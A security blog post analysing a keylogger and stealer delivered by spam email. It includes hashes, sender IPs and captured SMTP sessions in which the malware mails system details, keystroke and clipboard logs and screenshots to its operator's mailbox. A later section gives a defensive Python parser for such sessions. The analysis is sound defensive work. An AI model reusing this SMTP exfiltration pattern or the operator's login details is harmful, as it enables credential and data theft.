Another day, another bit of e-mail junk.
This one came to me from an AOL email account (sent by an authenticated AOL user, thereaty5@aol.com) and submitted from IP 41.138.164.240. The mail was sent to an address scraped from the internet.
inetnum:  41.138.164.0 - 41.138.165.255
netname:  VISAFONE-PH-PDSN1
descr:    Visafone Communications Limited,
descr:    12, Ologun Agbaje Street,
descr:    Victoria Island,
descr:    Lagos
country:  NG
Interestingly enough, Visafone is normally associated with financial 419 scams, and it is the first time I’ve seen malware emanate from Nigeria.
The file attached was:
SHA256: 7d82144bde1d75f327f847c60b870a7c7dc7dc0367c20500e8cff645f3c30667
Virustotal Report
Malwr Report
Both sites had never seen the file before.
It then extracts another file and launches it.
SHA256: 4efdba83132aaab21cadfcf624d6f7ce5fa89e6497d8f302388303cdb9b3a023
Virustotal Report
Malwr Report
This component had been seen before but is not detected by any AV.
Once run, it uses an unusual method to exfiltrate data: it sends a series of emails through the SMTP server mx1.3owl.com on port 587. The first message informs the malware owner that the system has been infected.
220 mx1.main-hosting.com ESMTP [Main-hosting.com Mail System]
EHLO w7vm1
250-mx1.main-hosting.com
250-PIPELINING
250-SIZE 5728640
250-ETRN
250-AUTH PLAIN LOGIN
250-AUTH=PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
AUTH login Y3Jvc3NAbGl2ZWRhdGEuaGludHMubWU=
334 UGFzc3dvcmQ6
==
235 2.7.0 Authentication successful
MAIL FROM:<cross@livedata.hints.me>
250 2.1.0 Ok
RCPT TO:<cross@livedata.hints.me>
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
MIME-Version: 1.0
From: cross@livedata.hints.me
To: cross@livedata.hints.me
Date: 26 Oct 2014 19:22:53 +0000
Subject: Logger - Server Ran - [W7VM1]
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: quoted-printable

This is an email notifying you that W7VM1 has ran your logger and emails=
 should be sent to you shortly and at interval choosen.=0D=0A =0D=0ALogger=
 Details: =0D=0AServer Name: scandetail.exe=0D=0AKeylogger Enabled: True=
=0D=0AClipboard-Logger Enabled: True=0D=0ATime Logs will be delivered: Every=
 10 minutes=0D=0A =0D=0AStealers Enabled: True=0D=0ATime Log will be delivered:=
 Average 2 to 4 minutes=0D=0A =0D=0ALocal Date and Time: 26/10/2014 19:22:51=
=0D=0AInstalled Language: en-US=0D=0AOperating System: Microsoft Windows=
 7 Professional =0D=0AInternal IP Address: REDACTED=0D=0AExternal IP=
 Address: REDACTED=0D=0AInstalled Anti-Virus: =0D=0AInstalled Firewall:=
.
250 2.0.0 Ok: queued as A05F9144111D
421 4.4.2 mx1.main-hosting.com Error: timeout exceeded
It then steals information from the system.
220 mx1.main-hosting.com ESMTP [Main-hosting.com Mail System]
EHLO w7vm1
250-mx1.main-hosting.com
250-PIPELINING
250-SIZE 5728640
250-ETRN
250-AUTH PLAIN LOGIN
250-AUTH=PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
AUTH login Y3Jvc3NAbGl2ZWRhdGEuaGludHMubWU=
334 UGFzc3dvcmQ6
==
235 2.7.0 Authentication successful
MAIL FROM:<cross@livedata.hints.me>
250 2.1.0 Ok
RCPT TO:<cross@livedata.hints.me>
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
MIME-Version: 1.0
From: cross@livedata.hints.me
To: cross@livedata.hints.me
Date: 26 Oct 2014 18:53:29 +0000
Subject: Logger|Recovery Log - [W7VM1]
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: quoted-printable

**********************************************=
=0D=0A Operating System Intel Recovery=
=0D=0A **********************************************=
=0D=0ACPU Name: W7VM1=0D=0ALocal Date and Time: 26/10/2014 18:53:22=0D=0AInstalled=
 Language: en-US=0D=0ANet Version: 2.0.50727.5420=0D=0AOperating System=
 Platform: Win32NT=0D=0AOperating System Version: 6.1.7601.65536=0D=0AOperating=
 System: Microsoft Windows 7 Professional =0D=0AInternal IP Address: REDACTED=
=0D=0AExternal IP Address: REDACTED=0D=0AInstalled Anti-Virus: =0D=0AInstalled=
 Firewall: =0D=0A **********************************************=
=0D=0A WEB Browser Password Recovery=
=0D=0A **********************************************=
=0D=0A=0D=0A **********************************************=
=0D=0A Mail Messenger Password Recovery=
=0D=0A **********************************************=
=0D=0A=0D=0A **********************************************=
=0D=0A Internet Download Manager Recovery=
=0D=0A **********************************************=
=0D=0A **********************************************=
=0D=0A Jdownloader Password Recovery=
=0D=0A **********************************************=
=0D=0A **********************************************=
=0D=0A Steam Username Recovery=
=0D=0A **********************************************=
=0D=0A
.
250 2.0.0 Ok: queued as 92F9D14401FA
Then it sends screenshots.
220 mx1.main-hosting.com ESMTP [Main-hosting.com Mail System]
EHLO w7vm1
250-mx1.main-hosting.com
250-PIPELINING
250-SIZE 5728640
250-ETRN
250-AUTH PLAIN LOGIN
250-AUTH=PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
AUTH login Y3Jvc3NAbGl2ZWRhdGEuaGludHMubWU=
334 UGFzc3dvcmQ6
==
235 2.7.0 Authentication successful
MAIL FROM:<cross@livedata.hints.me>
250 2.1.0 Ok
RCPT TO:<cross@livedata.hints.me>
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
MIME-Version: 1.0
From: cross@livedata.hints.me
To: cross@livedata.hints.me
Date: 26 Oct 2014 19:32:53 +0000
Subject: Logger - Key Recorder - [W7VM1]
Content-Type: multipart/mixed; boundary=--boundary_0_acca6283-88a8-4958-b80e-0ab8b84bb2be

----boundary_0_acca6283-88a8-4958-b80e-0ab8b84bb2be
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: quoted-printable

**********************************************=
=0D=0A ClipBoard Log=0D=0A=
**********************************************=
=0D=0A[------------19:22:51------------]=0D=0Ahttps://www.virustotal.com/en-gb/file/4efdba83132aaab21cadfcf624d6f7ce5fa89e6497d8f302388303cdb9b3a023/analysis/1414351286/=
=0D=0A=0D=0A[------------19:23:15------------]=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=
=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=
=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=
=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=
=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=
=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=
=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=
=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=
=0D=0A=0D=0A=0D=0A[------------19:28:55------------]=0D=0Across@livedata.hints.me=
=0D=0A=0D=0A[------------19:28:55------------]=0D=0Across@livedata.hints.me=
=0D=0A=0D=0A[------------19:28:55------------]=0D=0Across@livedata.hints.me=
=0D=0A=0D=0A[------------19:28:55------------]=0D=0Across@livedata.hints.me=
=0D=0A=0D=0A[------------19:28:55------------]=0D=0Across@livedata.hints.me=
=0D=0A=0D=0A[------------19:28:55------------]=0D=0Across@livedata.hints.me=
=0D=0A=0D=0A[------------19:28:55------------]=0D=0Across@livedata.hints.me=
=0D=0A=0D=0A[------------19:28:55------------]=0D=0A=0D=0A=0D=0A[------------19:30:28------------]=
=0D=0A=0D=0ALOL=0D=0A=0D=0A=0D=0A **********************************************=
=0D=0A Keylogger Log=0D=0A=
**********************************************=
=0D=0A=0D=0A=0D=0A[Untitled - Notepad - 26/10/2014 19:24:51]=0D=0A[BS] [del]=
 are [ctrl] 35[/ctrl]=0D=0A=0D=0ALOL=0D=0ALOL=0D=0ALOL[^] [ctrl]=
 cvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv[/ctrl]
----boundary_0_acca6283-88a8-4958-b80e-0ab8b84bb2be
Content-Type: application/octet-stream; name=screenshot1.jpeg
Content-Transfer-Encoding: base64

iVBORw0KGgoAAAANSUhEUgAABJ4AAAOJCAYAAABcZ+hHAAAAAXNSR0IArs4c6QAAAARnQU1B
TRUNCATED
So poorly done. The mail is submitted using SMTP AUTH with the credentials of the mail account, and AUTH LOGIN only base64-encodes them!
User: cross@livedata.hints.me
Password: REDACTED
oops!
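As an added example (not from the original post), a small Python triage helper that walks a captured session like the ones above and pulls out what a defender wants to record: it decodes the base64 AUTH LOGIN username and password, notes the envelope sender and recipient and the Subject, and undoes the quoted-printable body so the logger's report reads as plain lines. The transcript embedded below is a constructed, shortened copy of the first session, with the redacted password token replaced by a placeholder; the function and variable names are mine.

```python
import base64, quopri, re

# Constructed sample: a shortened copy of the first session above, with the
# redacted password token replaced by base64("PLACEHOLDER").
SAMPLE = """\
AUTH login Y3Jvc3NAbGl2ZWRhdGEuaGludHMubWU=
334 UGFzc3dvcmQ6
UExBQ0VIT0xERVI=
235 2.7.0 Authentication successful
MAIL FROM:<cross@livedata.hints.me>
RCPT TO:<cross@livedata.hints.me>
354 End data with <CR><LF>.<CR><LF>
Subject: Logger - Server Ran - [W7VM1]
Content-Transfer-Encoding: quoted-printable

This is an email notifying you that W7VM1 has ran your logger=0D=0ALogger=
 Details: =0D=0AServer Name: scandetail.exe=0D=0AKeylogger Enabled: True
.
250 2.0.0 Ok: queued as A05F9144111D
"""

def parse_session(transcript):
    """Pull the triage fields out of one captured SMTP session."""
    out = {"auth_user": None, "auth_password": None, "mail_from": None,
           "rcpt_to": [], "subject": None, "body_lines": []}
    lines, data, in_data = transcript.splitlines(), [], False
    for idx, line in enumerate(lines):
        if in_data:                            # DATA runs until the lone "."
            in_data = line != "."
            data += [line] if in_data else []
            continue
        m = re.match(r"AUTH\s+LOGIN\s+(\S+)$", line, re.I)
        if m:   # inline base64 user; the password is the client's reply to 334
            out["auth_user"] = base64.b64decode(m.group(1)).decode()
            pw = next((ln for ln in lines[idx + 1:] if not re.match(r"\d{3}", ln)), None)
            out["auth_password"] = base64.b64decode(pw).decode() if pw else None
        elif line.upper().startswith("MAIL FROM:"):
            out["mail_from"] = line.split(":", 1)[1].strip("<> ")
        elif line.upper().startswith("RCPT TO:"):
            out["rcpt_to"].append(line.split(":", 1)[1].strip("<> "))
        elif line.startswith("354"):
            in_data = True
    split = data.index("") if "" in data else len(data)
    hdr = dict(h.split(": ", 1) for h in data[:split] if ": " in h)
    out["subject"] = hdr.get("Subject")
    raw = "\r\n".join(data[split + 1:]).encode("ascii", "replace")
    if hdr.get("Content-Transfer-Encoding", "").lower() == "quoted-printable":
        raw = quopri.decodestring(raw)         # undo =0D=0A and "=" soft breaks
    out["body_lines"] = [ln.strip() for ln in raw.decode().splitlines() if ln.strip()]
    return out
```

Feed it a full session as captured and the decoded body gives the hostname, logger name and delivery interval the operator configured, which are the values worth keeping alongside the sender mailbox when writing detections for this family.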
Additionally, another address seems related to this: ab.frankmoore@live.com (friendly name “Wofa Group Plc”, which appears on one website as a company in… Nigeria), which was also used in September 2013 to send similar “please open the attached” malware emails. In some test messages the IP 41.138.164.31 (close to the one above), registered to Nigeria’s VISAFONE, was used to submit via webmail.
At the time of researching and writing this document it seems nobody has fallen for this other than researchers. (tag: ubapaul)